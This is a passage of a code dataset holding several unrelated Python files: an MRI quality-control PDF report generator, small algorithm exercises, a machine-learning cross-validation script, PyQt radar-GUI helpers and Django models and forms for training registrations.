result[subid] = {'success': True, 'path': sub_path}\n return out_group_file, out_indiv_files, result\n\n\ndef summary_cover(data, is_group=False, out_file=None):\n \"\"\" Generates a cover page with subject information \"\"\"\n import datetime\n import codecs\n from xhtml2pdf import pisa # pylint: disable=no-name-in-module\n\n # open output file for writing (truncated binary)\n result = open(out_file, \"w+b\")\n\n substr = ''\n if is_group:\n substr += ''\n substr += (''\n '')\n\n\n for k, info in sorted(list(data['params'].items())):\n if is_group:\n substr += '' % tuple(k)\n else:\n substr += '' % tuple(k)\n substr += ''.format(**info)\n substr += '' % info['tr'] if 'tr' in info.keys() else ''\n substr += '' % info['size_t'] if 'size_t' in info.keys() else ''\n substr += '\\n'\n substr += '
    Subject IDSessionScan IDImage size (voxels)Spacing (mm)TR (ms)Time steps
    %s%s%s
    %s%s{size:s}{spacing:s}%fN/A%d1
    '\n\n html_dir = op.abspath(\n op.join(op.dirname(__file__), 'html', 'cover_group.html'\n if is_group else 'cover_subj.html'))\n\n with codecs.open(html_dir, mode='r', encoding='utf-8') as ftpl:\n html = ftpl.read().format\n\n if is_group:\n values = {'imparams': substr, 'modality': data['modality'], 'failed': data['failed'],\n 'timestamp': datetime.datetime.now().strftime(\"%Y-%m-%d, %H:%M\")}\n else:\n values = {'sub_id': data['sub_id'], 'imparams': substr, 'modality': data['modality'],\n 'timestamp': datetime.datetime.now().strftime(\"%Y-%m-%d, %H:%M\"),\n 'failed': data['failed']}\n\n # convert HTML to PDF\n status = pisa.pisaDocument(html(**values), result, encoding='UTF-8')\n result.close()\n\n # return True on success and False on errors\n return status.err\n\n\ndef concat_pdf(in_files, out_file='concatenated.pdf'):\n \"\"\" Concatenate PDF list (http://stackoverflow.com/a/3444735) \"\"\"\n from PyPDF2 import PdfFileWriter, PdfFileReader\n\n with open(out_file, 'wb') as out_pdffile:\n outpdf = PdfFileWriter()\n\n for in_file in in_files:\n with open(in_file, 'rb') as in_pdffile:\n inpdf = PdfFileReader(in_pdffile)\n for fpdf in range(inpdf.numPages):\n outpdf.addPage(inpdf.getPage(fpdf))\n outpdf.write(out_pdffile)\n\n return out_file\n\n\ndef _write_report(dframe, groups, sub_id=None, sc_split=False, condensed=True,\n out_file='report.pdf'):\n \"\"\" Generates the violin plots of each qctype \"\"\"\n columns = dframe.columns.ravel()\n headers = []\n for group in groups:\n rem = []\n for head in group:\n if head not in columns:\n rem.append(head)\n else:\n headers.append(head)\n for i in rem:\n group.remove(i)\n\n report = PdfPages(out_file)\n sessions = sorted(pd.unique(dframe.session_id.ravel()))\n for ssid in sessions:\n sesdf = dframe.copy().loc[dframe['session_id'] == ssid]\n scans = pd.unique(sesdf.run_id.ravel())\n if sc_split:\n for scid in scans:\n subset = sesdf.loc[sesdf['run_id'] == scid]\n if len(subset.index) > 1:\n if sub_id is None:\n subtitle = '(%s_%s)' % (ssid, scid)\n else:\n subtitle = '(subject %s_%s_%s)' % (sub_id, ssid, scid)\n if condensed:\n fig = plot_all(sesdf, groups, subject=sub_id,\n title='QC measures ' + subtitle)\n else:\n fig = plot_measures(\n sesdf, headers, subject=sub_id,\n title='QC measures ' + subtitle)\n report.savefig(fig, dpi=300)\n fig.clf()\n else:\n if len(sesdf.index) > 1:\n if sub_id is None:\n subtitle = '(%s)' % (ssid)\n else:\n subtitle = '(subject %s_%s)' % (sub_id, ssid)\n if condensed:\n fig = plot_all(sesdf, groups, subject=sub_id,\n title='QC measures ' + subtitle)\n else:\n fig = plot_measures(\n sesdf, headers, subject=sub_id,\n title='QC measures ' + subtitle)\n report.savefig(fig, dpi=300)\n fig.clf()\n\n report.close()\n plt.close()\n # print 'Written report file %s' % out_file\n return out_file\n\ndef report_anatomical(\n dframe, subject=None, sc_split=False, condensed=True,\n out_file='anatomical.pdf'):\n \"\"\" Calls the report generator on the functional measures \"\"\"\n return _write_report(dframe, STRUCTURAL_QCGROUPS, sub_id=subject, sc_split=sc_split,\n condensed=condensed, out_file=out_file)\n\n\ndef report_functional(\n dframe, subject=None, sc_split=False, condensed=True,\n out_file='functional.pdf'):\n \"\"\" Calls the report generator on the functional measures \"\"\"\n from tempfile import mkdtemp\n\n wdir = mkdtemp()\n fspatial = _write_report(\n dframe, FUNC_TEMPORAL_QCGROUPS, sub_id=subject, sc_split=sc_split,\n condensed=condensed, out_file=op.join(wdir, 'fspatial.pdf'))\n\n ftemporal = _write_report(\n dframe, FUNC_SPATIAL_QCGROUPS, sub_id=subject, sc_split=sc_split,\n condensed=condensed, out_file=op.join(wdir, 'ftemporal.pdf'))\n\n concat_pdf([fspatial, ftemporal], out_file)\n return out_file\n\ndef generate_csv(data_type, settings):\n datalist = []\n errorlist = []\n jsonfiles = glob.glob(op.join(settings['work_dir'], 'derivatives', '%s*.json' % data_type))\n\n if not jsonfiles:\n raise RuntimeError('No individual QC files were found in the working directory'\n '\\'%s\\' for the \\'%s\\' data type.' % (settings['work_dir'], data_type))\n\n for jsonfile in jsonfiles:\n dfentry = _read_and_save(jsonfile)\n if dfentry is not None:\n if 'exec_error' not in dfentry.keys():\n datalist.append(dfentry)\n else:\n errorlist.append(dfentry['subject_id'])\n\n dataframe = pd.DataFrame(datalist)\n cols = dataframe.columns.tolist() # pylint: disable=no-member\n\n reorder = []\n for field in ['run', 'session', 'subject']:\n for col in cols:\n if col.startswith(field):\n reorder.append(col)\n\n for col in reorder:\n cols.remove(col)\n cols.insert(0, col)\n\n if 'mosaic_file' in cols:\n cols.remove('mosaic_file')\n\n # Sort the dataframe, with failsafe if pandas version is too old\n try:\n dataframe = dataframe.sort_values(by=['subject_id', 'session_id', 'run_id'])\n except AttributeError:\n #pylint: disable=E1101\n dataframe = dataframe.sort(columns=['subject_id', 'session_id', 'run_id'])\n\n # Drop duplicates\n try:\n #pylint: disable=E1101\n dataframe.drop_duplicates(['subject_id', 'session_id', 'run_id'], keep='last',\n inplace=True)\n except TypeError:\n #pylint: disable=E1101\n dataframe.drop_duplicates(['subject_id', 'session_id', 'run_id'], take_last=True,\n inplace=True)\n\n out_fname = op.join(settings['output_dir'], data_type + 'MRIQC.csv')\n dataframe[cols].to_csv(out_fname, index=False)\n return dataframe, errorlist\n\n\ndef _read_and_save(in_file):\n with open(in_file, 'r') as jsondata:\n values = _flatten(json.load(jsondata))\n return values\n return None\n\n\ndef _flatten(in_dict, parent_key='', sep='_'):\n items = []\n for k, val in list(in_dict.items()):\n new_key = parent_key + sep + k if parent_key else k\n if isinstance(val, collections.MutableMapping):\n items.extend(_flatten(val, new_key, sep=sep).items())\n else:\n items.append((new_key, val))\n return dict(items)\n","sub_path":"reports/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":14207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"463775537","text":"class Node(object):\n def __init__(self, val, children):\n self.val = val\n self.children = children\n\n# recursive\nclass Solution(object):\n def postorder(self, root):\n \"\"\"\n :type root: Node\n :rtype: List[int]\n \"\"\"\n if not root:\n return []\n ans = []\n for n in root.children:\n ans.extend(self.postorder(n))\n ans.append(root.val)\n return ans\n\n# iterative\nclass Solution1(object):\n def postorder(self, root):\n \"\"\"\n :type root: Node\n :rtype: List[int]\n \"\"\"\n if not root:\n return []\n stack = []\n stack.append(root)\n result = []\n while len(stack) > 0:\n pop = stack.pop()\n result = [pop.val] + result\n # mind the order of the children\n for i in range(len(pop.children)):\n stack.append(pop.children[i])\n return result","sub_path":"leetcode/590-n-ary-tree-postorder-traversal/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"604295299","text":"def safe_pawns(pawns):\n \n safePawns = 0\n \n for pawn in pawns:\n col = pawn[0]\n row = pawn[1]\n \n defenseRow = str(int(row)-1)\n defenseLeft = chr(ord(col)-1) + defenseRow\n defenseRight = chr(ord(col)+1) + defenseRow\n \n if defenseLeft in pawns or defenseRight in pawns:\n safePawns += 1\n \n return safePawns\n","sub_path":"CiO/pawn-brotherhood.py","file_name":"pawn-brotherhood.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"97079298","text":"import numpy as np\nimport LinearClassifier\n\ndef read_arff(datafile):\n data = []\n with open(datafile, \"r\") as f:\n for line in f:\n name = line.split(' ')\n\n tag = name[0].lower()\n if tag == '@attribute' or tag == '@data' or tag == '@relation':\n continue\n\n data_line = np.zeros(101)\n data_list = tag.strip('\\n').split(',')\n for i, feature in enumerate(data_list):\n if feature == '1' or feature == '+':\n data_line[i] = 1\n elif feature == '0' or feature == '-':\n data_line[i] = 0\n\n data.append(data_line)\n return np.array(data)\n\ndef main():\n data = read_arff(\"decision-trees/modified.badge.data.arff\")\n\n alpha_choices = [0.001, 0.01] # Learning rate\n err_thres_choices = [1e-3, 1e-2] # Error threshold\n weight_init_choices = [1e-1] # Weight initialization range\n\n fold1 = data[0:65]\n fold2 = data[65:122]\n fold3 = data[122:168]\n fold4 = data[168:234]\n fold5 = data[234:296]\n folds = [fold1, fold2, fold3, fold4, fold5]\n\n # Cross Validation\n model_avgs = []\n model_stds = []\n for k in range(10):\n\n # Randomly pick the hyperparameters\n alpha = np.random.choice(alpha_choices)\n err_thres = np.random.choice(err_thres_choices)\n weight_init = np.random.choice(weight_init_choices)\n print(\"Alpha: %f, Error Threshold: %f, Weight Init: %f\" % (alpha, err_thres, weight_init))\n\n accuracies = np.zeros(5)\n for i in range(5):\n\n # Split data folds into validation and training data\n X_train = np.vstack([folds[j][:, 0:100] for j in range(5) if j != i])\n y_train = np.hstack([2*folds[j][:, 100]-1 for j in range(5) if j != i])\n X_val = folds[i][:, 0:100]\n y_val = 2*folds[i][:, 100] - 1\n\n # Create and train model\n lc = LinearClassifier.LinearClassifier()\n lc.train(X_train, y_train, alpha, err_thres, weight_init)\n\n # Test model on training and testing data\n train_accuracy = lc.test(X_train, y_train)\n accuracy = lc.test(X_val, y_val)\n\n # Save the best model\n accuracies[i] = accuracy\n print(\"Train Accuracy: %f\" % (train_accuracy))\n print(\"Validation Accuracy: %f\" % (accuracy,))\n\n print(\" \")\n model_avgs.append(np.mean(accuracies))\n model_stds.append(np.std(accuracies))\n print(\"Accuracies: \", model_avgs)\n print(\"Standard Dev: \", model_stds)\n\nif __name__ == \"__main__\":\n main()","sub_path":"hw2/higa2-hw2/badges_stump.py","file_name":"badges_stump.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"481761568","text":"\"\"\"\n2주차 스터디 퀴즈\n\n- 1번 문제\n\n정수를 하나 씩 입력 받아서 0을 입력하면 이전까지 입력한 정수 모든 합을 출력하기\nex)\n숫자 입력 : 5\n숫자 입력 : 4\n숫자 입력 : 3\n숫자 입력 : 2\n숫자 입력 : 10\n숫자 입력 : -1\n숫자 입력 : 0\n결과 : 23\n\"\"\"\nvalueSum = 0\n\nwhile True:\n inputValue = int(input(\"숫자 입력 >\"))\n\n if inputValue == 0 :\n print(\"결과 : {}\".format(valueSum))\n break\n\n valueSum += inputValue\n\n\n\"\"\"\n- 2번 문제\n\n피라미드 별찍기\nex) 찍을 줄 수 : 4\n *\n ***\n *****\n*******\n\"\"\"\n\nrowCount = int(input(\"줄 수>\"))\n\nfor i in range(1, rowCount + 1):\n print(\" \" * (rowCount - i), \"*\" * (i * 2 - 1), sep=\"\")\n\n\n\"\"\"\n- 3번 문제\n\n리스트 내포를 사용해서 0 ~ 100 까지의 수 중 2와 3의 공배수를 출력하기\n단, 답은 한줄로 표현 가능해야 함 (2와 3이 포함되어야함)\n단, if 안에는 하나의 조건만 판단해야 함\nex) [0, 6, 12, 18, 24, 30, 36, 42, 48, 54, 60, 66, 72, 78, 84, 90, 96]\n추가: 플머님들은 if문에 조건은 단 하나로 해야하고, 가장 최적화된 결과를 도출해 낼 수 있도록 할것\n\"\"\"\nprint( [ i for i in range(0, 100+1, 2) if i % 3 == 0])\n\n\n\"\"\"\n- 4번 문제\n\n10개의 문자를 입력 받아서 같은 문자열의 개수를 세는 Dict를 print 한다.\n\nex)\n1문자 입력 : ABC\n2문자 입력 : ABC\n3문자 입력 : GOOD\n4문자 입력 : BC\n5문자 입력 : BC\n6문자 입력 : ABC\n7문자 입력 : GOOD\n8문자 입력 : ABC\n9문자 입력 : ABC\n10문자 입력 : ABC\n\n결과 : {'ABC': 6, 'GOOD' : 2, 'BC':2}\n\"\"\"\n\ninputCount = 1\ndic = {}\n\nwhile True:\n inString = str(input(\"{}문자 입력 >\".format(inputCount)))\n inputCount += 1\n\n if inString == \"quit\":\n break\n \n if not (inString in dic):\n dic[inString] = 1\n else:\n dic[inString] += 1\n \nprint(dic)","sub_path":"HW2.py","file_name":"HW2.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28525859","text":"class Good:\n \"\"\"[class for goods in store]\n \"\"\"\n def __init__(self,name , barcode,brand,price):\n \"\"\"[summary]\n\n Args:\n name ([str]): [name of product]\n barcode ([int]): [barcode of product]\n brand ([str]): [brand of product]\n price ([int]): [price of product]\n \"\"\"\n self.name= name\n self.barcode=barcode\n self.brand=brand\n self.price=price","sub_path":"phase 2/good_class.py","file_name":"good_class.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"538451235","text":"from django.db import models\nfrom django.contrib import admin\nfrom django.db import models\nfrom django.utils import translation\n\nfrom django_personals.models import (\n PersonAbstract,\n ContactAbstract,\n AddressAbstract,\n SocialAbstract,\n SkillAbstract,\n AwardAbstract,\n FormalEduAbstract,\n NonFormalEduAbstract,\n WorkingAbstract,\n VolunteerAbstract,\n PublicationAbstract,\n FamilyAbstract\n)\n\n_ = translation.gettext_lazy\n\n\nclass Person(PersonAbstract):\n class Meta:\n verbose_name = _('Person')\n verbose_name_plural = _('Persons')\n\n\nclass PersonContact(ContactAbstract):\n person = models.OneToOneField(\n Person, on_delete=models.CASCADE,\n related_name='contact')\n\n\nclass SocialMedia(SocialAbstract):\n person = models.OneToOneField(\n Person, on_delete=models.CASCADE,\n related_name='social_media'\n )\n\n\nclass PersonAddress(AddressAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='addresses'\n )\n\n\nclass Skill(SkillAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='skills'\n )\n\n\nclass Award(AwardAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='awards'\n )\n\n\nclass FormalEducation(FormalEduAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='formal_educations'\n )\n\n\nclass NonFormalEducation(NonFormalEduAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='non_formal_educations'\n )\n\n\nclass Working(WorkingAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='work_histories'\n )\n\n\nclass Volunteer(VolunteerAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='volunteers'\n )\n\n\nclass Publication(PublicationAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='publications'\n )\n\n\nclass Family(FamilyAbstract):\n person = models.ForeignKey(\n Person, on_delete=models.CASCADE,\n related_name='families'\n )\n","sub_path":"example/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"95093049","text":"from PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import (\n QWidget, QLabel, QFrame, QVBoxLayout, QHBoxLayout, QToolButton, QGridLayout, QCheckBox,\n QLineEdit, QDialog, QPushButton, QSpinBox\n)\nimport sys\nimport os\nfrom argparse import ArgumentParser\nimport acconeer_utils\n\n\ndef lib_version_up_to_date(gui_handle=None):\n fdir = os.path.dirname(os.path.realpath(__file__))\n fn = os.path.join(fdir, \"../../lib/acconeer_utils/__init__.py\")\n if os.path.isfile(fn):\n with open(fn, \"r\") as f:\n lines = [line.strip() for line in f.readlines()]\n\n for line in lines:\n if line.startswith(\"__version__\"):\n fs_lib_ver = line.split(\"=\")[1].strip()[1:-1]\n break\n else:\n fs_lib_ver = None\n else:\n fs_lib_ver = None\n\n used_lib_ver = getattr(acconeer_utils, \"__version__\", None)\n\n rerun_text = \"You probably need to rerun setup.py (python setup.py install --user)\"\n error_text = None\n if used_lib_ver:\n sb_text = \"Lib v{}\".format(used_lib_ver)\n\n if fs_lib_ver != used_lib_ver:\n sb_text += \" (mismatch)\"\n error_text = \"Lib version mismatch.\"\n error_text += \" Installed: {} Latest: {}\\n\".format(used_lib_ver, fs_lib_ver)\n error_text += rerun_text\n else:\n sb_text = \"Lib version unknown\"\n error_text = \"Could not read installed lib version\" + rerun_text\n\n if gui_handle is not None:\n gui_handle.labels[\"libver\"].setText(sb_text)\n if error_text and sys.executable.endswith(\"pythonw.exe\"):\n gui_handle.error_message(error_text)\n else:\n if not sys.executable.endswith(\"pythonw.exe\") and error_text:\n prompt = \"\\nThe GUI might not work properly!\\nContinue anyway? [y/N]\"\n while True:\n print(error_text + prompt)\n choice = input().lower()\n if choice.lower() == \"y\":\n return True\n elif choice == \"\" or choice.lower() == \"n\":\n return False\n else:\n sys.stdout.write(\"Please respond with 'y' or 'n' \"\n \"(or 'Y' or 'N').\\n\")\n return True\n\n\nclass AdvancedSerialDialog(QDialog):\n def __init__(self, state, parent):\n super().__init__(parent)\n\n self.setMinimumWidth(350)\n self.setModal(True)\n self.setWindowTitle(\"Advanced serial settings\")\n\n layout = QVBoxLayout()\n self.setLayout(layout)\n\n texts = [\n \"Please note:\",\n (\n \"Overriding the baudrate disables automatic\"\n \" detection and negotiation of baudrate.\"\n ),\n \"Only use on special hardware.\",\n ]\n\n for text in texts:\n lbl = QLabel(text, self)\n lbl.setWordWrap(True)\n layout.addWidget(lbl)\n\n layout.addStretch(1)\n\n self.cb = QCheckBox(\"Override baudrate\", self)\n self.cb.stateChanged.connect(self.cb_state_changed)\n layout.addWidget(self.cb)\n\n self.sb = QSpinBox(self)\n self.sb.setRange(1, int(3e6))\n layout.addWidget(self.sb)\n\n layout.addStretch(1)\n\n buttons_widget = QWidget(self)\n layout.addWidget(buttons_widget)\n hbox = QHBoxLayout()\n buttons_widget.setLayout(hbox)\n hbox.addStretch(1)\n cancel_btn = QPushButton(\"Cancel\")\n cancel_btn.clicked.connect(self.reject)\n hbox.addWidget(cancel_btn)\n save_btn = QPushButton(\"Save\")\n save_btn.setDefault(True)\n save_btn.clicked.connect(self.accept)\n hbox.addWidget(save_btn)\n\n self.set_state(state)\n\n def cb_state_changed(self, state):\n self.sb.setEnabled(bool(state))\n\n def set_state(self, state):\n checked = state is not None\n self.cb.setChecked(checked)\n self.cb_state_changed(checked)\n self.sb.setValue(state if checked else 115200)\n\n def get_state(self):\n return self.sb.value() if self.cb.checkState() else None\n\n\nclass GUIArgumentParser(ArgumentParser):\n def __init__(self):\n super().__init__()\n\n self.add_argument(\"-ml\",\n \"--machine-learning\",\n dest=\"machine_learning\",\n help=\"Enable machine learning\",\n action=\"store_true\")\n\n self.add_argument(\"-b\",\n \"--beta-features\",\n dest=\"beta_features\",\n help=\"Enable beta features\",\n action=\"store_true\")\n\n\nclass Label(QLabel):\n def __init__(self, img, img_scale=0.7):\n super(Label, self).__init__()\n\n self.img_scale = img_scale\n self.pixmap = QPixmap(img)\n\n self.setMinimumSize(1, 1)\n self.setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignHCenter)\n self.setPixmap(self.pixmap)\n\n def resizeEvent(self, event):\n w = self.size().width() * self.img_scale\n h = self.size().height() * self.img_scale\n scaled_size = QtCore.QSize(w, h)\n\n scaled_pixmap = self.pixmap.scaled(\n scaled_size,\n QtCore.Qt.KeepAspectRatio,\n QtCore.Qt.SmoothTransformation,\n )\n\n self.setPixmap(scaled_pixmap)\n\n\nclass CollapsibleSection(QFrame):\n def __init__(self, header_text, init_collapsed=False, is_top=False):\n super().__init__()\n\n if not is_top:\n self.setObjectName(\"CollapsibleSection\")\n self.setStyleSheet(\"#CollapsibleSection{border-top: 1px solid lightgrey;}\")\n\n self._layout = QVBoxLayout(self)\n self._layout.setContentsMargins(0, 0, 0, 0)\n self._layout.setSpacing(0)\n self.setLayout(self._layout)\n self._header_widget = QWidget()\n self.body_widget = QWidget()\n self._layout.addWidget(self._header_widget)\n self._layout.addWidget(self.body_widget)\n\n self.grid = QGridLayout(self.body_widget)\n self.grid.setContentsMargins(9, 0, 9, 9)\n self.grid.setColumnStretch(0, 1)\n self.grid.setColumnStretch(1, 1)\n\n self._header_widget_layout = QHBoxLayout(self._header_widget)\n self._header_widget_layout.setContentsMargins(7, 7, 7, 7)\n self._header_widget.setLayout(self._header_widget_layout)\n\n self._button = QToolButton()\n self._button.setText(header_text)\n self._button.setCheckable(True)\n self._button.setStyleSheet(\"QToolButton { border: none; }\")\n self._button.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)\n self._button.pressed.connect(self.button_event)\n self.button_event(override=init_collapsed)\n self._header_widget_layout.addWidget(self._button)\n self._header_widget_layout.addStretch()\n\n def button_event(self, override=None):\n if override is None:\n checked = not self._button.isChecked()\n else:\n checked = override\n self._button.setChecked(checked)\n\n if checked: # collapsed\n self._button.setArrowType(QtCore.Qt.ArrowType.RightArrow)\n self.body_widget.hide()\n else:\n self._button.setArrowType(QtCore.Qt.ArrowType.DownArrow)\n self.body_widget.show()\n\n\nclass SensorSelection(QFrame):\n def __init__(self, multi_sensors=False, error_handler=None, callback=None):\n super().__init__()\n\n self.error_handler = error_handler\n self.multi_sensors = multi_sensors\n self.cb = callback\n self.select_hist = [1, 0, 0, 0]\n\n # text, checked, visible, enabled, function\n checkbox_info = {\n \"sensor_1\": (\"1\", True, True, True, lambda: self.sensor_limits(1)),\n \"sensor_2\": (\"2\", False, True, True, lambda: self.sensor_limits(2)),\n \"sensor_3\": (\"3\", False, True, True, lambda: self.sensor_limits(3)),\n \"sensor_4\": (\"4\", False, True, True, lambda: self.sensor_limits(4)),\n }\n\n self.checkboxes = {}\n for key, (text, checked, visible, enabled, func) in checkbox_info.items():\n cb = QCheckBox(text, self)\n cb.setChecked(checked)\n cb.setVisible(visible)\n cb.setEnabled(enabled)\n if func:\n cb.stateChanged.connect(func)\n self.checkboxes[key] = cb\n\n self.textbox = QLineEdit()\n self.textbox.setText(\"1\")\n self.textbox.editingFinished.connect(lambda: self.check_value())\n\n self.grid = QtWidgets.QGridLayout(self)\n self.grid.setContentsMargins(0, 0, 0, 0)\n self.grid.addWidget(self.checkboxes[\"sensor_1\"], 0, 0)\n self.grid.addWidget(self.checkboxes[\"sensor_2\"], 0, 1)\n self.grid.addWidget(self.checkboxes[\"sensor_3\"], 0, 2)\n self.grid.addWidget(self.checkboxes[\"sensor_4\"], 0, 3)\n self.grid.addWidget(self.textbox, 0, 4)\n\n self.set_multi_sensor_support(multi_sensors)\n\n def get_sensors(self):\n sensors = []\n if self.multi_sensors:\n for s in range(1, 5):\n sensor_id = \"sensor_{:d}\".format(s)\n if self.checkboxes[sensor_id].isChecked():\n sensors.append(s)\n else:\n sensors.append(int(self.textbox.text()))\n\n return sensors\n\n def set_sensors(self, sensors):\n if not sensors:\n sensors = []\n\n if not isinstance(sensors, list):\n sensors = [sensors]\n\n try:\n if len(sensors) > 1:\n self.set_multi_sensor_support(True)\n except Exception as e:\n self.error_handler(\"Could not set sensor {}\".format(e))\n\n if self.multi_sensors:\n for s in range(1, 5):\n enabled = s in sensors\n sensor_id = \"sensor_{:d}\".format(s)\n self.checkboxes[sensor_id].setChecked(enabled)\n else:\n if isinstance(sensors, list):\n sensors = sensors[0]\n try:\n self.textbox.setText(str(sensors))\n except Exception as e:\n self.error_handler(\"Could not set sensor {}\".format(e))\n\n def set_multi_sensor_support(self, multi_sensors):\n if multi_sensors is None:\n multi_sensors = False\n self.multi_sensors = multi_sensors\n\n if isinstance(multi_sensors, list):\n multi_sensors = True\n\n self.textbox.setVisible(not multi_sensors)\n\n for s in range(1, 5):\n sensor_id = \"sensor_{:d}\".format(s)\n self.checkboxes[sensor_id].setVisible(multi_sensors)\n\n if multi_sensors:\n self.sensor_limits()\n\n def check_value(self):\n error = None\n if not self.textbox.text().isdigit():\n error = \"Sensor must be an integer between 1 and 4!\\n\"\n self.textbox[\"sensor\"].setText(\"1\")\n else:\n sensor = int(self.textbox.text())\n e = sensor < 1 or sensor > 4\n if e:\n error = \"Sensor must be an integer between 1 and 4!\\n\"\n self.textbox.setText(\"1\")\n\n if error is not None and self.error_message is not None:\n self.error_handler(error)\n\n def sensor_limits(self, sensor=None):\n if not self.multi_sensors:\n return\n\n if sensor:\n if self.checkboxes[\"sensor_%d\" % sensor].isChecked():\n if sensor not in self.select_hist:\n self.select_hist.insert(0, sensor)\n self.select_hist.pop(4)\n if not self.checkboxes[\"sensor_%d\" % sensor].isChecked():\n if sensor in self.select_hist:\n self.select_hist.pop(self.select_hist.index(sensor))\n self.select_hist.insert(3, 0)\n\n # if self.multi_sensors is a list, we limit the max nr of sensor to its length\n if isinstance(self.multi_sensors, list):\n allowed_nr = len(self.multi_sensors)\n current_nr = len(self.get_sensors())\n diff = current_nr - allowed_nr\n s = 3\n while diff > 0 and s >= 0:\n if self.select_hist[s]:\n sensor_id = \"sensor_{:d}\".format(self.select_hist[s])\n self.checkboxes[sensor_id].setChecked(False)\n self.select_hist[s] = 0\n self.select_hist.pop(s)\n self.select_hist.insert(3, 0)\n diff = len(self.get_sensors()) - len(self.multi_sensors)\n s -= 1\n\n if self.cb is not None:\n self.cb()\n\n\nclass ErrorFormater:\n def __init__(self):\n pass\n\n def error_to_text(self, error):\n exc_type, exc_obj, exc_tb = sys.exc_info()\n fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n err_text = \"File: {}
    Line: {}
    Error: {}\".format(fname, exc_tb.tb_lineno, error)\n\n return err_text\n\n\nclass QHLine(QFrame):\n def __init__(self):\n super(QHLine, self).__init__()\n self.setFrameShape(QFrame.HLine)\n self.setFrameShadow(QFrame.Sunken)\n\n\nclass QVLine(QFrame):\n def __init__(self):\n super(QVLine, self).__init__()\n self.setFrameShape(QFrame.VLine)\n self.setFrameShadow(QFrame.Sunken)\n\n\nclass PassthroughProcessor:\n def __init__(self, sensor_config, processing_config, session_info):\n pass\n\n def process(self, data):\n return data\n\n\nclass Count:\n def __init__(self, val=0):\n self.val = val\n\n def pre_incr(self):\n self.val += 1\n return self.val\n\n def post_incr(self):\n ret = self.val\n self.val += 1\n return ret\n\n def decr(self, val=1):\n self.val -= val\n\n def set_val(self, val):\n self.val = val\n\n\nclass GUI_Styles:\n def get_button_style(self):\n return (\n \"QPushButton {\"\n \"background-color: #f0f0f0;\"\n \"border-width: 1px;\"\n \"border-color: #339;\"\n \"}\"\n \"QPushButton:pressed {\"\n \"background-color: red;\"\n \"}\"\n \"QPushButton:hover:!pressed {\"\n \"background-color: lightcoral;\"\n \"}\"\n )\n","sub_path":"gui/elements/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":14255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"149748697","text":"# -*- coding: utf-8 -*-\n\nfrom django import forms\nfrom abc_admin.models import Registration, ClientUser, Session, Stagiaire\nimport datetime\n\n#Registration Form\nclass RegistrationForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n self.request = kwargs.pop(\"request\")\n super(RegistrationForm, self).__init__(*args, **kwargs)\n self.client = ClientUser.objects.filter(user=self.request.user).latest('user')\n self.session = Session.objects.get(pk=self.request.GET['session_id'])\n self.fields['participant_list'].queryset = Stagiaire.objects.filter(corporate=self.client.corporate)\n self.fields['participant_list'].required = False\n\n\n participant = forms.IntegerField(label='Nombre de participant :', required=True)\n PAIEMENT_CHOICES = (\n ('Entreprise','Entreprise'),\n ('OPCA','OPCA'),\n )\n paiement = forms.ChoiceField(label='Mode de reglement :', required=True, choices=PAIEMENT_CHOICES)\n class Meta:\n model = Registration\n fields = ['paiement', 'participant','participant_list']\n labels = {\n 'participant_list': \"Liste des participants :\"\n }\n\n def clean_participant(self):\n participant_max = self.session.participant_number\n participant = self.cleaned_data.get('participant')\n\n if participant>participant_max:\n raise forms.ValidationError('Il n\\'y a pas assez de place disponile. Il reste '+str(participant_max)+ ' place(s) pour cette session de formation.')\n\n return participant\n\n def clean_participant_list(self):\n participant = self.cleaned_data.get('participant')\n participant_list = self.cleaned_data.get('participant_list')\n if participant_list.count() > participant:\n raise forms.ValidationError('Vous devez selectionner autant ou moins de stagiaire.')\n\n if participant==0:\n raise forms.ValidationError('Vous devez selectionner au moins 1 participants.')\n\n return participant_list\n\n\n\n\n def save(self, commit=True):\n registration = super(RegistrationForm, self).save(commit=False)\n count = Registration.objects.count()\n if count == 0:\n new_key = int(datetime.date.today().strftime(\"%y\"))*1000 + 1\n else:\n new_key = Registration.objects.latest('id').key + 1\n registration.key = new_key\n registration.client = self.client\n registration.session = self.session\n if commit:\n registration.save()\n last_available_place = registration.session.participant_number\n registration.session.participant_number = last_available_place-self.cleaned_data.get('participant')\n registration.session.save()\n\n return registration\n\nclass StagiaireForm(forms.ModelForm):\n class Meta:\n model = Stagiaire\n exclude = ('corporate',)\n labels = {\n 'firstname': 'Prenom :',\n 'lastname': \"Nom :\",\n 'sexe': \"Sexe :\",\n 